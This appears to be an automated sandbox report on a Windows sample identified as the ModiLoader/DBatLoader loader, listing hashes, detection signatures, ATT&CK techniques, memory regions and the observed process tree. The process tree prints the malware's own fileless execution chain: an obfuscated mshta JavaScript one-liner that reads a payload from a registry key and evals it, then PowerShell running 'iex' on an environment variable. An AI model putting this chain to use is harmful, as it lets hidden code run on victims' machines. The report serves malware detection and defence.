Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 03:48

General

  • Target

    381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe

  • Size

    396KB

  • MD5

    381a181f8e40fc7ddf8c2c15dc6d55a2

  • SHA1

    f68755990d7dc1b8d346080b62dda8a8b0369cba

  • SHA256

    9f195d5b1ff0a5f0c07973d60624c89141c01c0d01d3f8091aa7626150ddf598

  • SHA512

    18823d064ed0ef65921a7fe9d7cf5efb46672c0e71128a7ff6dace37d4575fa8a8d15068aa6180ba607d0458aeb68a903b849c90c8e296a7acadb4eb05de3482

  • SSDEEP

    12288:qr+gCgRhGHQLJdTdQmX7PT8Iq2JrE2s0vbvd:qrBPYkE2sa1

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3360
    • C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"
      2⤵
        PID:2288
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:eNYtS4="wn";m82z=new%20ActiveXObject("WScript.Shell");yQIxnq05="84D2Y";UF5bg=m82z.RegRead("HKLM\\software\\Wow6432Node\\JlLiYm\\KwgNiHQz1T");B3PNO="2Ms";eval(UF5bg);O04dLyoy="EE";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4432
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:oiiu
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2488

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kqdin4ry.nlb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2288-15-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-17-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-12-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-16-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-4-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2288-14-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-13-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-18-0x00000000008E0000-0x00000000009B6000-memory.dmp
      Filesize

      856KB

    • memory/2288-10-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2288-11-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2488-36-0x00000000068C0000-0x000000000690C000-memory.dmp
      Filesize

      304KB

    • memory/2488-22-0x0000000005AF0000-0x0000000005B12000-memory.dmp
      Filesize

      136KB

    • memory/2488-23-0x0000000005B90000-0x0000000005BF6000-memory.dmp
      Filesize

      408KB

    • memory/2488-24-0x0000000006360000-0x00000000063C6000-memory.dmp
      Filesize

      408KB

    • memory/2488-38-0x0000000006DA0000-0x0000000006DBA000-memory.dmp
      Filesize

      104KB

    • memory/2488-34-0x0000000006460000-0x00000000067B4000-memory.dmp
      Filesize

      3.3MB

    • memory/2488-35-0x0000000006890000-0x00000000068AE000-memory.dmp
      Filesize

      120KB

    • memory/2488-20-0x0000000003180000-0x00000000031B6000-memory.dmp
      Filesize

      216KB

    • memory/2488-37-0x0000000008130000-0x00000000087AA000-memory.dmp
      Filesize

      6.5MB

    • memory/2488-21-0x0000000005D30000-0x0000000006358000-memory.dmp
      Filesize

      6.2MB